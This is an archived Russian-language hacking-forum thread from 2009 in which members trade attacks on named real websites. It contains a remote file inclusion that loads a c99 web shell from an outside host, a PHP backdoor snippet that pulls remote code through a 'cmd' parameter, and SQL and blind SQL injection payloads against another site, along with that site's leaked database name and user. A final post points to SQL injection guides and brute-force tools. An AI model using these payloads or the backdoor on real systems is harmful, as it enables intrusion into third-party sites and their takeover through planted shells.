HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.03.2009, 05:11
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
 
Ответить с цитированием

  #2  
Старый 01.03.2009, 05:18
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от TELO  
а как такой роскрутить?
http://shop.zano.ru/index.php?act=13 order by 1
ошибку видишь?

Warning: include() [function.include]: Failed opening '13-1.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/host700852/zano.ru/htdocs/shop/index.php on line 204
 
Ответить с цитированием

  #3  
Старый 01.03.2009, 13:23
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

http://shop.zano.ru/index.php?act=http://mail.ru/?

ыы
 
Ответить с цитированием

  #4  
Старый 01.03.2009, 13:37
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

http://shop.zano.ru/index.php?act=http://wowbkdo.narod.ru/c99madshell =)))
 
Ответить с цитированием

  #5  
Старый 01.03.2009, 14:08
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108

Репутация: 445


По умолчанию

Всем здрасти
При подборе колонок выводиться

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

Перебрал 20 колонок все так же
URL:

http://frutonyanya.ru/php/news.php?c=1'

 
Ответить с цитированием

  #6  
Старый 01.03.2009, 14:29
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Pashkela в своём духе =)
Код:
if(isset($_GET['cmd'])){$f=require("http://pashkela.narod.ru/tema1.txt");die($f);}
Файлик -абревиатура от вебмани

diznt, там же ясно пишет. Запрещен микс груп бай и других параметров, кроме мин, макс, каунт...
 
Ответить с цитированием

  #7  
Старый 01.03.2009, 14:30
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Цитата:
Сообщение от diznt  
Всем здрасти
При подборе колонок выводиться

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...)

Перебрал 20 колонок все так же
URL:

http://frutonyanya.ru/php/news.php?c=1'

https://forum.antichat.ru/showpost.php?p=966458&postcount=3908
советую забить на скулю доступа к information_schema нет
Цитата:
http://frutonyanya.ru/php/news.php?c=77+group+by+'cc'+and+(select+1+from+inf ormation_schema.tables)--
//add а ну да не обратил внимания на ветку=) 4.1

Последний раз редактировалось l1ght; 01.03.2009 в 14:36..
 
Ответить с цитированием

  #8  
Старый 01.03.2009, 14:30
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

2 diznt

blind sql injection

version: 4.1.22-log
database : frutony3_fn
user : frutony3_fn@localhost



http://frutonyanya.ru/php/news.php?n=25&c=49+AND+ASCII(SUBSTRING((select+use r()),1,1))>x
 
Ответить с цитированием

  #9  
Старый 01.03.2009, 14:38
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Где можно почитать о блинд скуль инъекциях?
 
Ответить с цитированием

  #10  
Старый 01.03.2009, 14:43
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

[MySQL/SQL-inj]
SQL injection полный FAQ
Там же скрипты для вывода всех записей из таблицы, брута имен столбцов и полей.
SQL injection полный FAQ: системные переменные
SQL injection полный FAQ: прелести двойного запроса
Вообще очень и очень полезная вещь, прошу особенно обратить внимание на неё - случаи когда права на файлы у пользователя БД есть, но кавычки экранируются более чем частые.
И как показывает практика найти, читая сорцы найти, уязвимый запрос, данные из которого подставляются в другой запрос, более чем реально, а результат шелл.
Так же имейте ввиду что иногда, данные из запроса подставляются в функции include() или eval() - тут надо следить за выводом ошибок при SQL инъекции.

Новая SQL Injection Tool 4
SQL инъекция (в т.ч. и blind SQL)
SQL инъекция (в т.ч. и blind SQL): Работа с инъекциями в MySQL третьей версии.
SQL инъекция (в т.ч. и blind SQL): Скрипт для работы со слепыми инъекциями.
Там же можно найти словари для брута имён таблиц и колонок, а вот и ещё:
SQL databases
[antichat] sql4 dictionary
Имена таблиц
Новая альтернатива Benchmark'y или эффективный blind SQL-injection
Справочное руководство по MySQL
Мануалы с офф сайта (English), по версиям: 3.23, 4.0, 4.1 5.0 5.1 6.0
by Grey
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ